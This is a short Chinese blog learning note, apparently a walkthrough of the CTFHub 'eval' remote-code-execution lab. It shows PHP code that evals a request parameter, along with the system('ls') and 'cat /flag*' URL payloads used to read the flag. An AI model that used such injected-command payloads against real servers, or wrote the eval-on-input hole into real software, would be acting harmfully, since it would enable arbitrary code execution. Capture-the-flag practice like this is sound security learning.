CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
遗憾随她而去.6 分钟前
react学习(一)
javascript·学习·react.js
Darkershadow13 分钟前
蓝牙学习之通过OP CODE解析输入输出数据
学习·蓝牙·ble·mesh
m0_7167652329 分钟前
数据结构--栈的插入、删除、查找详解
开发语言·数据结构·c++·经验分享·学习·青少年编程·visual studio
江苏世纪龙科技31 分钟前
【世纪龙科技】给智能网联汽车教学装上一个“数字副驾”
学习
invicinble33 分钟前
对于学习视频的技巧
学习
承渊政道39 分钟前
【递归、搜索与回溯算法】(二叉树深搜模型拆解与经典题型全面突破)
数据结构·c++·学习·算法·leetcode·macos·bfs
鱼鳞_42 分钟前
Java学习笔记_Day32(IO流字符集字符流)
java·笔记·学习
Hical_W1 小时前
深入学习CPP26_静态反射
c++·学习
夜瞬9 小时前
NLP学习笔记01:文本预处理详解——从清洗、分词到词性标注
笔记·学习·自然语言处理
-Springer-10 小时前
STM32 学习 —— 个人学习笔记11-1(SPI 通信协议及 W25Q64 简介 & 软件 SPI 读写 W25Q64)
笔记·stm32·学习
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点03一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛042026 年 AI 编程助手全面对比评测:Cursor vs Copilot vs Claude Code vs GitHub Copilot Free05GPT-6核心能力解析及与现有主流大模型对比06基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南07GPT-6发布日深度解析-Symphony架构200万Token实战08AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析09零成本!Ollama本地部署国产大模型全指南(支持Kimi-K2.5/GLM-5/Qwen,新手秒上手)10从限购到畅通:GLM-5.1 Coding Plan接入攻略